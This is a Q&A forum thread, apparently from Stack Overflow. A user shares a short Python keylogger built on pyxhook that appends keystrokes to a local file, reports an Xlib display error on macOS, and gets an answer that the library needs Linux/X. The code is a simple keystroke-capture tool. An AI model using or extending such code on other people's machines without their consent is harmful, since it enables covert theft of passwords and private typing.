# Python Key-logger (.error.DisplayNameError: Bad display name "")

Tags: python, django, macos, keylogger, websecurity

I was following up on a tutorial to build a python keylogger and ended up with this problem. I have gone over my codes about 10 times and compared it with other sources but yet still getting the same error. I have seen similar complaints while looking for a solution, and I hypothesize that it might be my computer( Mac OSX 10.12 sierra, MacBook Pro (13-inch, Mid 2010)). I am not a computer expert so I am not too sure.
If it is my system architecture, how do I by-pass it ?
if not, what am I missing in the code or where is my error ?

```
 import pyxhook

log_file =  "/Users/VemPC/Desktop/log_file.log"


def onPress(event):
    fob = open(log_file, 'a')
    fob.write(event.key)
    fob.write('\n')
    if event.key.ascii == 96 :
        fob.close()
        new_hook.cancel()


new_hook = pyxhook.HookManager()
new_hook.KeyDown = onPress
new_hook.HookKeyboard()
new_hook.start()





 Error:
Traceback (most recent call last):
  File "key_logger.py", line 15, in <module>
    new_hook = pyxhook.HookManager()
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/pyxhook/pyxhook.py", line 67, in __init__
    self.local_dpy = display.Display()
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/Xlib/display.py", line 89, in __init__
    self.display = _BaseDisplay(display)
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/Xlib/display.py", line 71, in __init__
    protocol_display.Display.__init__(self, *args, **keys)
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/Xlib/protocol/display.py", line 85, in __init__
    name, protocol, host, displayno, screenno = connect.get_display(display)
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/Xlib/support/connect.py", line 73, in get_display
    return mod.get_display(display)
  File "/Users/VemPC/Desktop/Challenges/venv/lib/python3.7/site-packages/Xlib/support/unix_connect.py", line 61, in get_display
    raise error.DisplayNameError(display)
Xlib.error.DisplayNameError: Bad display name ""
```

Answer (score 0):

pyxhook seems to be a linux specific library. Specifically, it is an implementation of PyHook for linux, using X, the window system library. MacOS provides *some* support for this, but not all, as MacOS is not built on X. It seems like you won't be able to use this library on your system.

Comment: It's been a while but any alternatives that you can think of? Something to listen to keys and produce events when, say, cmd + fn + a are pressed?